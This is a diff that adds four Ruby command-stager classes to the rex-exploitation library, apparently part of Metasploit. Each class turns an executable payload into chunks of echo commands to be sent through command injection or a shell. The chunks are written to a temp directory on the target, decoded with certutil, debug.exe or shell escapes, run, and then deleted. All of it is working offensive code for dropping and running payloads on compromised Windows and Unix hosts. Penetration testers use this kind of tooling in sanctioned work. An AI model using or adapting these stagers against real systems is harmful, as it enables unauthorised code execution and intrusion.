rex-exploitation 0.1.0

data/lib/rex/exploitation/cmdstager/certutil.rb

@@ -0,0 +1,114 @@
+# -*- coding: binary -*-
+
+require 'rex/text'
+require 'rex/arch'
+
+module Rex
+module Exploitation
+
+###
+#
+# This class provides the ability to create a sequence of commands from an executable.
+# When this sequence is ran via command injection or a shell, the resulting exe will
+# be written to disk and executed.
+#
+# This particular version uses Windows certutil to base64 decode a file,
+# created via echo >>, and decode it to the final binary.
+#
+#
+# Written by xistence
+# Original discovery by @mattifestation - https://gist.github.com/mattifestation/47f9e8a431f96a266522
+#
+###
+
+class CmdStagerCertutil < CmdStagerBase
+
+  def initialize(exe)
+    super
+
+    @var_encoded = Rex::Text.rand_text_alpha(5)
+    @var_decoded = Rex::Text.rand_text_alpha(5)
+    @decoder     = nil # filled in later
+  end
+
+
+  # Override just to set the extra byte count
+  # @param opts [Array] The options to generate the command line
+  # @return [Array] The complete command line
+  def generate_cmds(opts)
+    # Set the start/end of the commands here (vs initialize) so we have @tempdir
+    @cmd_start = "echo "
+    @cmd_end   = ">>#{@tempdir}#{@var_encoded}.b64"
+    xtra_len = @cmd_start.length + @cmd_end.length + 1
+    opts.merge!({ :extra => xtra_len })
+    super
+  end
+
+
+  # Simple base64 encoder for the executable
+  # @param opts [Array] The options to generate the command line
+  # @return [String] Base64 encoded executable
+  def encode_payload(opts)
+    Rex::Text.encode_base64(@exe)
+  end
+
+
+  # Combine the parts of the encoded file with the stuff that goes
+  # before / after it.
+  # @param parts [Array] Splitted commands
+  # @param opts [Array] The options to generate the command line
+  # @return [Array] The command line
+  def parts_to_commands(parts, opts)
+
+    cmds = []
+    parts.each do |p|
+      cmd = ''
+      cmd << @cmd_start
+      cmd << p
+      cmd << @cmd_end
+      cmds << cmd
+    end
+
+    cmds
+  end
+
+
+  # Generate the commands that will decode the file we just created
+  # @param opts [Array] The options to generate the command line
+  # @return [Array] The certutil Base64 decoder part of the command line
+  def generate_cmds_decoder(opts)
+
+    cmds = []
+    cmds << "certutil -decode #{@tempdir}#{@var_encoded}.b64 #{@tempdir}#{@var_decoded}.exe"
+    return cmds
+  end
+
+
+  # We override compress commands just to stick in a few extra commands
+  # last second..
+  # @param cmds [Array] Complete command line
+  # @param opts [Array] Extra options for command line generation
+  # @return [Array] The complete command line including cleanup
+  def compress_commands(cmds, opts)
+    # Make it all happen
+    cmds << "#{@tempdir}#{@var_decoded}.exe"
+
+    # Clean up after unless requested not to..
+    if (not opts[:nodelete])
+      cmds << "del #{@tempdir}#{@var_encoded}.b64"
+      # NOTE: We won't be able to delete the exe while it's in use.
+    end
+
+    super
+  end
+
+  # Windows uses & to concat strings
+  #
+  # @return [String] Concat operator
+  def cmd_concat_operator
+    " & "
+  end
+
+end
+end
+end

data/lib/rex/exploitation/cmdstager/debug_asm.rb

@@ -0,0 +1,139 @@
+# -*- coding: binary -*-
+
+require 'rex/text'
+require 'rex/arch'
+
+module Rex
+module Exploitation
+
+###
+#
+# This class provides the ability to create a sequence of commands from an executable.
+# When this sequence is ran via command injection or a shell, the resulting exe will
+# be written to disk and executed.
+#
+# This particular version uses debug.exe to assemble a small COM file. The COM will
+# take a hex-ascii file, created via echo >>, and decode it to the final binary.
+#
+# Requires: debug.exe
+#
+# Written by Joshua J. Drake
+#
+###
+
+class CmdStagerDebugAsm < CmdStagerBase
+
+  def initialize(exe)
+    super
+
+    @var_decoder_asm  = Rex::Text.rand_text_alpha(8) + ".dat"
+    @var_decoder_com  = Rex::Text.rand_text_alpha(8) + ".com"
+    @var_payload_in   = Rex::Text.rand_text_alpha(8) + ".dat"
+    @var_payload_out  = Rex::Text.rand_text_alpha(8) + ".exe"
+    @decoder          = nil # filled in later
+  end
+
+
+  #
+  # Override just to set the extra byte count
+  #
+  def generate_cmds(opts)
+    # Set the start/end of the commands here (vs initialize) so we have @tempdir
+    @cmd_start = "echo "
+    @cmd_end   = ">>#{@tempdir}#{@var_payload_in}"
+    xtra_len = @cmd_start.length + @cmd_end.length + 1
+    opts.merge!({ :extra => xtra_len })
+    super
+  end
+
+
+  #
+  # Simple hex encoding...
+  #
+  def encode_payload(opts)
+    ret = @exe.unpack('H*')[0]
+  end
+
+
+  #
+  # Combine the parts of the encoded file with the stuff that goes
+  # before / after it.
+  #
+  def parts_to_commands(parts, opts)
+
+    cmds = []
+    parts.each do |p|
+      cmd = ''
+      cmd << @cmd_start
+      cmd << p
+      cmd << @cmd_end
+      cmds << cmd
+    end
+
+    cmds
+  end
+
+
+  #
+  # Generate the commands that will decode the file we just created
+  #
+  def generate_cmds_decoder(opts)
+
+    # Allow decoder stub override (needs to input base64 and output bin)
+    @decoder = opts[:decoder] if (opts[:decoder])
+
+    # Read the decoder data file
+    f = File.new(@decoder, "rb")
+    decoder = f.read(f.stat.size)
+    f.close
+
+    # Replace variables
+    decoder.gsub!(/decoder_stub/, "#{@tempdir}#{@var_decoder_asm}")
+    decoder.gsub!(/h2b\.com/, "#{@tempdir}#{@var_decoder_com}")
+    # NOTE: these two filenames MUST 8+3 chars long.
+    decoder.gsub!(/testfile\.dat/, "#{@var_payload_in}")
+    decoder.gsub!(/testfile\.out/, "#{@var_payload_out}")
+
+    # Split it apart by the lines
+    decoder.split("\n")
+  end
+
+
+  #
+  # We override compress commands just to stick in a few extra commands
+  # last second..
+  #
+  def compress_commands(cmds, opts)
+    # Convert the debug script to an executable...
+    cvt_cmd = ''
+    if (@tempdir != '')
+      cvt_cmd << "cd %TEMP% && "
+    end
+    cvt_cmd << "debug < #{@tempdir}#{@var_decoder_asm}"
+    cmds << cvt_cmd
+
+    # Convert the encoded payload...
+    cmds << "#{@tempdir}#{@var_decoder_com}"
+
+    # Make it all happen
+    cmds << "start #{@tempdir}#{@var_payload_out}"
+
+    # Clean up after unless requested not to..
+    if (not opts[:nodelete])
+      cmds << "del #{@tempdir}#{@var_decoder_asm}"
+      cmds << "del #{@tempdir}#{@var_decoder_com}"
+      cmds << "del #{@tempdir}#{@var_payload_in}"
+      # XXX: We won't be able to delete the payload while it is running..
+    end
+
+    super
+  end
+
+  # Windows uses & to concat strings
+  def cmd_concat_operator
+    " & "
+  end
+
+end
+end
+end

data/lib/rex/exploitation/cmdstager/debug_write.rb

@@ -0,0 +1,133 @@
+# -*- coding: binary -*-
+
+require 'rex/text'
+require 'rex/arch'
+
+module Rex
+module Exploitation
+
+###
+#
+# This class provides the ability to create a sequence of commands from an executable.
+# When this sequence is ran via command injection or a shell, the resulting exe will
+# be written to disk and executed.
+#
+# This particular version uses debug.exe to write a small .NET binary. That binary will
+# take a hex-ascii file, created via echo >>, and decode it to the final binary.
+#
+# Requires: .NET, debug.exe
+#
+###
+
+class CmdStagerDebugWrite < CmdStagerBase
+
+  def initialize(exe)
+    super
+
+    @var_bypass  = Rex::Text.rand_text_alpha(8)
+    @var_payload = Rex::Text.rand_text_alpha(8)
+    @decoder     = nil # filled in later
+  end
+
+
+  #
+  # Override just to set the extra byte count
+  #
+  def generate_cmds(opts)
+    # Set the start/end of the commands here (vs initialize) so we have @tempdir
+    @cmd_start = "echo "
+    @cmd_end   = ">>#{@tempdir}#{@var_payload}"
+    xtra_len = @cmd_start.length + @cmd_end.length + 1
+    opts.merge!({ :extra => xtra_len })
+    super
+  end
+
+
+  #
+  # Simple hex encoding...
+  #
+  def encode_payload(opts)
+    @exe.unpack('H*')[0]
+  end
+
+
+  #
+  # Combine the parts of the encoded file with the stuff that goes
+  # before / after it.
+  #
+  def parts_to_commands(parts, opts)
+
+    cmds = []
+    parts.each do |p|
+      cmd = ''
+      cmd << @cmd_start
+      cmd << p
+      cmd << @cmd_end
+      cmds << cmd
+    end
+
+    cmds
+  end
+
+
+  #
+  # Generate the commands that will decode the file we just created
+  #
+  def generate_cmds_decoder(opts)
+
+    # Allow decoder stub override (needs to input base64 and output bin)
+    @decoder = opts[:decoder] if (opts[:decoder])
+
+    # Read the decoder data file
+    f = File.new(@decoder, "rb")
+    decoder = f.read(f.stat.size)
+    f.close
+
+    # Replace variables
+    decoder.gsub!(/decoder_stub/, "#{@tempdir}#{@var_bypass}")
+
+    # Split it apart by the lines
+    decoder.split("\n")
+  end
+
+
+  #
+  # We override compress commands just to stick in a few extra commands
+  # last second..
+  #
+  def compress_commands(cmds, opts)
+    # Convert the debug script to an executable...
+    cvt_cmd = ''
+    if (@tempdir != '')
+      cvt_cmd << "cd %TEMP% && "
+    end
+    cvt_cmd << "debug < #{@tempdir}#{@var_bypass}"
+    cmds << cvt_cmd
+
+    # Rename the resulting binary
+    cmds << "move #{@tempdir}#{@var_bypass}.bin #{@tempdir}#{@var_bypass}.exe"
+
+    # Converting the encoded payload...
+    cmds << "#{@tempdir}#{@var_bypass}.exe #{@tempdir}#{@var_payload}"
+
+    # Make it all happen
+    cmds << "start #{@tempdir}#{@var_payload}.exe"
+
+    # Clean up after unless requested not to..
+    if (not opts[:nodelete])
+      cmds << "del #{@tempdir}#{@var_bypass}.exe"
+      cmds << "del #{@tempdir}#{@var_payload}"
+      # XXX: We won't be able to delete the payload while it is running..
+    end
+
+    super
+  end
+
+  # Windows uses & to concat strings
+  def cmd_concat_operator
+    " & "
+  end
+
+end
+end
+end

data/lib/rex/exploitation/cmdstager/echo.rb

@@ -0,0 +1,166 @@
+# -*- coding: binary -*-
+
+require 'rex/text'
+require 'rex/arch'
+require 'shellwords'
+
+module Rex
+module Exploitation
+
+class CmdStagerEcho < CmdStagerBase
+
+  ENCODINGS = {
+    'hex'   => "\\\\x",
+    'octal' => "\\\\"
+  }
+
+  def initialize(exe)
+    super
+
+    @var_elf = Rex::Text.rand_text_alpha(5)
+  end
+
+  #
+  # Override to ensure opts[:temp] is a correct *nix path
+  # and initialize opts[:enc_format].
+  #
+  def generate(opts = {})
+    opts[:temp] = opts[:temp] || '/tmp/'
+
+    unless opts[:temp].empty?
+      opts[:temp].gsub!(/\\/, '/')
+      opts[:temp] = opts[:temp].shellescape
+      opts[:temp] << '/' if opts[:temp][-1,1] != '/'
+    end
+
+    # by default use the 'hex' encoding
+    opts[:enc_format] = opts[:enc_format].nil? ? 'hex' : opts[:enc_format].to_s
+
+    unless ENCODINGS.keys.include?(opts[:enc_format])
+      raise RuntimeError, "CmdStagerEcho - Invalid Encoding Option: #{opts[:enc_format]}"
+    end
+
+    super
+  end
+
+  #
+  # Override to set the extra byte count
+  #
+  def generate_cmds(opts)
+    # Set the start/end of the commands here (vs initialize) so we have @tempdir
+    @cmd_start = "echo "
+    unless opts[:noargs]
+      @cmd_start += "-en "
+    end
+
+    @cmd_end   = ">>#{@tempdir}#{@var_elf}"
+    xtra_len = @cmd_start.length + @cmd_end.length
+    opts.merge!({ :extra => xtra_len })
+
+    @prefix = opts[:prefix] || ENCODINGS[opts[:enc_format]]
+    min_part_size = 5 # for both encodings
+
+    if (opts[:linemax] - opts[:extra]) < min_part_size
+      raise RuntimeError, "CmdStagerEcho - Not enough space for command - #{opts[:extra] + min_part_size} byte required, #{opts[:linemax]} byte available"
+    end
+
+    super
+  end
+
+
+  #
+  # Encode into a format that echo understands, where
+  # interpretation of backslash escapes are enabled. For
+  # hex, it'll look like "\\x41\\x42", and octal will be
+  # "\\101\\102\\5\\41"
+  #
+  def encode_payload(opts)
+    case opts[:enc_format]
+    when 'octal'
+      return Rex::Text.to_octal(@exe, @prefix)
+    else
+      return Rex::Text.to_hex(@exe, @prefix)
+    end
+  end
+
+
+  #
+  # Combine the parts of the encoded file with the stuff that goes
+  # before ("echo -en ") / after (">>file") it.
+  #
+  def parts_to_commands(parts, opts)
+    parts.map do |p|
+      cmd = ''
+      cmd << @cmd_start
+      cmd << p
+      cmd << @cmd_end
+      cmd
+    end
+  end
+
+  #
+  # Since the binary has been already dropped to fs, just execute and
+  # delete it
+  #
+  def generate_cmds_decoder(opts)
+    cmds = []
+    # Make it all happen
+    cmds << "chmod 777 #{@tempdir}#{@var_elf}"
+    #cmds << "chmod +x #{@tempdir}#{@var_elf}"
+    cmds << "#{@tempdir}#{@var_elf}#{' & echo' if opts[:background]}"
+
+    # Clean up after unless requested not to..
+    unless opts[:nodelete]
+      cmds << "rm -f #{@tempdir}#{@var_elf}"
+    end
+
+    return cmds
+  end
+
+  #
+  # Override it to ensure that the hex representation of a byte isn't cut
+  #
+  def slice_up_payload(encoded, opts)
+    encoded_dup = encoded.dup
+
+    parts = []
+    xtra_len = opts[:extra]
+    xtra_len ||= 0
+    while (encoded_dup.length > 0)
+      temp = encoded_dup.slice(0, (opts[:linemax] - xtra_len))
+      # cut the end of the part until we reach the start
+      # of a full byte representation "\\xYZ" or "\\YZX"
+      temp = fix_last_byte(temp, opts, encoded_dup)
+      parts << temp
+      encoded_dup.slice!(0, temp.length)
+    end
+
+    parts
+  end
+
+  def fix_last_byte(part, opts, remaining="")
+    fixed_part = part.dup
+
+    case opts[:enc_format]
+    when 'hex'
+      while (fixed_part.length > 0 && fixed_part[-5, @prefix.length] != @prefix)
+        fixed_part.chop!
+      end
+    when 'octal'
+      if remaining.length > fixed_part.length and remaining[fixed_part.length, @prefix.length] != @prefix
+        pos = fixed_part.rindex('\\')
+        pos -= 1 if fixed_part[pos-1] == '\\'
+        fixed_part.slice!(pos..fixed_part.length-1)
+      end
+    end
+
+    return fixed_part
+  end
+
+  def cmd_concat_operator
+    " ; "
+  end
+
+end
+end
+end